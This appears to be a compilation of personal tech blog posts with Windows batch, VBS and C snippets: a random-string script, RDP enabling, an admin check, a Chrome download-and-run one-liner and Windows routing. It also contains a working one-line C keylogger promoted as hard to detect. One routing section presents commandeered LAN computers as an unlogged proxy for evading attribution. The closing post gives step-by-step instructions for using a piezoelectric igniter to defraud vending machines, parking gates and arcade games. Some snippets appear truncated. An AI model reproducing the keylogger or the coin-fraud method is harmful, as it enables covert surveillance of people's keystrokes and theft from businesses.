Easily generate random strings in pure batch script

Using pure native Batch, this script generates random strings of any length and using any characters except ! % ^ & < >. This script should work on all Windows operating systems from XP onwards.

The code is pretty self-explanatory, so here goes:

@echo off

:: This is used to specify the required length of the random string
set len=12

:: This specifies the characters that will be used to generate the random string
set charpool=0123456789ABCDEF 

:: This specifies the length of the character pool above used to generate the string
set len_charpool=16

set gen_str=

:: Loop %len% times
for /L %%b IN (1, 1, %len%) do (

  :: %RANDOM% / !RANDOM! is replaced with a random variable between 0 and 32768
  :: This is used as our source of randomness so we use some simple math to 
  :: restrict the random range to be within the length of len_charpool
  set /A rnd_index=!RANDOM! * %len_charpool% / 32768

  :: Use for to allow us to expand and use the variable with batch's substring
  :: functionality, and append the substring at the random index determined above
  :: to the gen_str variable. See set /? for more information.
  for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set gen_str=!gen_str!%%i

:: The random string has been generated and stored in %gen_str%
echo %gen_str%

Here's a screenshot of the script in operation:

How I wrote a tiny keylogger in C, in a 1-line for-loop

I was challenged to write a keylogger in a line of C. This is the result.

This code is about 3 lines, especially when you #include , but the actual keylogger code is all written as an empty (1-line) for-loop.

int main(int i, FILE *log) {
 for(i=FreeConsole()&&(log=fopen("logf.txt","a+"));(GetAsyncKeyState(i)&1&&fputc(MapVirtualKey(i,2), log)&&!fflush(log))||1;i=(i==255&&!SleepEx(1,0)?0:i+1));

This is a very simple keylogger, but it works. It uses GetAsyncKeyState to sequentially check every key on the keyboard many times a second to see if it's being pressed. The advantages of this over a hooking keylogger are that it is harder to detect, smaller, and simpler.

This keylogger is case sensitive, so it will correctly log uppercase and lowercase letters. It also logs symbols, meta-keys, function keys, media-keys, etc -- but in binary, so the logs might have weird characters instead of "Backspace" or "F1", "PgDn", etc. Vim / less are good for viewing the logs.

Here's how it works:

// Main function. Use prototype to declare variables 
int main(int i, FILE *log) {
 // Begining of for loop
  // Initialise iterator (i) and open log file
  i = FreeConsole() && (log = fopen("logf.txt","a+")); 
  // Keylogger
  // - GetAsyncKeyState(i) -- determine if vkey 'i' is being pressed
  // - if vkey 'i' is being pressed (GetAsyncKeyState(i) & 1), 
  //   - convert it to a char code using MapVirtualKey(i,2) and 
  //  - write it to file with fputc() and flush the log file
  // - || 1 is added to the end to ensure the loop continues regardless of 
  //  other return values
  (GetAsyncKeyState(i) & 1 && fputc(MapVirtualKey(i,2), log) && !fflush(log)) || 1;
  // If i equals 255 set it to 0, otherwise increment it by one
  // call SleepEx(1,0) to avoid hogging the CPU.
  i = (i == 255 && !SleepEx(1,0) ? 0 : i+1)
 ) {
  // For-loop code block usually goes here, but we've squeezed all our code into the 
  // declaration of the for-loop, so this isn't necessary

This works because For-loops in C are quite flexible and can execute a lot of syntax inline without having to break into a code block below the for-loop. You just need to be conscious of the return-value of your code to ensure it doesn't cause the loop to exit or behave strangely.

Enable remote desktop access, using command line

If you need to RDP into a windows box that you have commandline access to, this is for you.

  1. First, permit RDP through the firewall.

    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
  2. Then, enable terminal services in the registry using the reg command:
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  3. Done!

To disable Remote Desktop access is just as easy:

  1. First, deny RDP through the firewall.

    netsh advfirewall firewall set rule group="remote desktop" new enable=No
  2. Then, disable terminal services in the registry using the reg command:
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
  3. Done!

Please note, you may need to reboot the windows machine for the changes to take effect (though problably not), and this doesn't work on "home" editions of Windows.

Batch script: check for admin rights

After some extensive research and testing, I have found the most accurate way to check for administrative privileges in batch script is:

@echo off

net session >nul 2>&1
if NOT "%errorlevel%"=="0" (
  ping -n 2 >nul 2>&1

ping -n 2 >nul 2>&1

Download Google Chrome installer without using a browser

Download and execute Google Chrome installer without a browser:

There are few things more painful than using Internet Explorer on a fresh Windows Server Install. As such, I have created this batch script to install Google Chrome without using Internet Explorer. Enjoy:

echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "https://dl.google.com/chrome/install/chrome_installer.exe", 0:o.send^(^):If o.Status=200 Then >"%temp%\d.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("%temp%\s.exe"^) Then f.DeleteFile "%temp%\s.exe" >>"%temp%\d.vbs" &echo a.SaveToFile "%temp%\s.exe" >>"%temp%\d.vbs" &echo End if >>"%temp%\d.vbs" &cscript //B "%temp%\d.vbs" &del /F /Q "%temp%\d.vbs" &start "" "%temp%\s.exe"

To use, simply paste the above into a command prompt and hit enter.

After a few moments while the Google Chrome installer is downloaded, the installation window will pop up and guide you through the rest of the process.

Right-click -> Paste, hit enter

A few seconds later, Google Chrome downloader.


This script is a Batch wrapper for a VBS script which uses the XMLHTTP object to download the Chrome installer from the Internet, the ADODB object to write it to disk, and Shell object to execute it.

For the sake of readability and completeness, here's a plain VBS script that does the same thing (without the Batch script wrapper):

Set xmlHttp=CreateObject("MSXML2.XMLHTTP")
Set adoStream=CreateObject("ADODB.Stream")
Set fileSys=Createobject("Scripting.FileSystemObject")
Set wsShell=WScript.CreateObject("WScript.Shell")

tmpFile = wsShell.ExpandEnvironmentStrings("%TEMP%\") & Rnd & ".exe"

xmlHttp.open "GET", "https://dl.google.com/chrome/install/chrome_installer.exe", 0
If xmlHttp.Status=200 Then  
 adoStream.Write xmlHttp.ResponseBody
 If fileSys.Fileexists(tmpFile) Then 
  fileSys.DeleteFile tmpFile
 End If
 adoStream.SaveToFile tmpFile 
 wsShell.Run tmpFile
End if 

To use this one you need to save it as a .vbs file and run it obviously. Which is slightly less convenient than the first one.

Configure a Windows computer to route traffic

Open up a privileged (running as administrator) command prompt, and type the following:

reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /T REG_DWORD /v IPEnableRouter /d 1

Restart computer.

The computer can now be used as a "default gateway" and will forward packets to it's own gateway. Additionally you can set the gateway of your new router by specifying a default route using the windows route command:

route delete
route add mask [Internet gateway IP]

Before you change your routes though it's a good idea to make note of your existing routes:

route print

This is scratching the very surface of Windows routing. Windows supports a full set of advanced routing options and routing protocols using the <code>netsh routing</code> command.

Scenario I:
Given access to multiple computers on a LAN one could enable routing on a windows XP/7/8 computer as above, and then use it as a kind of anonymising "proxy" by using it as your default gateway on your own device. I say device, because you could use this with anything -- mobile phone, tablet, laptop, network scanner, IP camera, etc... Everything the device does will appear to come from your "Windows router", and that computer will be the only one that knows that the traffic is actually coming from your device. Additionally, Windows doesn't keep logs of forwarded packets as proxies usually do, so once you've accessed some data on the Internet, there's no logs or information of any kind on the router-computer to implicate you. Pretty neat hey? But I should note that this can be changed -- for example if this scenario is suspected, someone could install logging software or a packet sniffer on the router-computer and then see your device communicating with it.

Scenario II:
This could be used to share an internet connection that one computer has access to, for example a USB-tethered phone. You could enabled routing on the tethered computer and set up other computers on the local network to use that computer as the default gateway.

Tricking skill testers and other machines into giving free credits

Using a piezoelectric "shocker", it is possible to trick certain coin receptors into "thinking" you have inserted a coin, when all you've really done is create a voltage spike in the electronics that was misinterpreted as the signal for "this guy has inserted a real, valid, authentic coin".

I have tried this with some success on coin slot modern machines, including vending machines, children's rides, parking gates, arcade games, and skilltesters. Here's a demonstration on a skilltester (crane game):

Skilltesters have preset payout rates, so really there's no skill involved. The claw's strength is set randomly, and in this demonstration the machine had a 2% payout rate, meaning that 1 in 50 games would be capable of lifting up the prize and dropping it in the chute.

How does this work? Can I do it?!

Yes, and it's pretty simple. If you're like me, you probably already know of these zappers by pulling apart electric lighters to see how they work! ...after which you proceeded to torment all your friends with it by zapping any piece of metal that they happen to touch.

This "zapper" is a piezoelectric igniter, it works by striking a piezoelectric material (such as quartz) with a springloaded hammer which generates a high-voltage potential difference between the terminals you can see in this picture:

For the purposes of this article, the black wire is terminal 1 and the brass endcap is terminal 2.
The black "stick" protruding from the other end is the striker.
When the striker is pressed, it will compress a spring-loaded hammer which will then release and strike the piezoelectric material generating a potential difference spike between the terminals causing a high voltage spark to jump up to a centimetre between the terminals and ignite a any flammable gas that happens to be there.


So in the video above, you can see that I just modified the lighter by taking out the gas internals leaving the zapper in there with its trigger. What you probably didn't notice, is the grounding wire I've incorporated into the handle. This wire leads from terminal two to the handle where it's exposed simply so that when hold the device, the wire is touching me, grounding terminal two. You need to do this, otherwise no potential difference will be created between terminal one and the thing you're zapping (the zappee), and no spark will occur. By the way, the terminals are interchangeable -- it doesn't matter which one you use for what.

So in summary, you need to touch one terminal to ground it, and zap the machine with the other terminal.


So once you have your zapper, you need to find something to zap. Remember, it makes a difference where you zap, and while you're aiming your jolt of electricity at the coin circuit, that jolt of electricity can take a roundabout route to said circuit. I found a vending machine where I had to zap a screw on the other side of the machine to get a dollar, and when I zapped closer to the coin slot the machine just reset.

Warning! Please note:

While it's highly unlikely and I have not encountered any situations where this has permanently damaged a machine, it is possible. Also, please note that cheating these machines and/or even just zapping them intentionally is probably illegal, so be aware of the legalities before doing anything.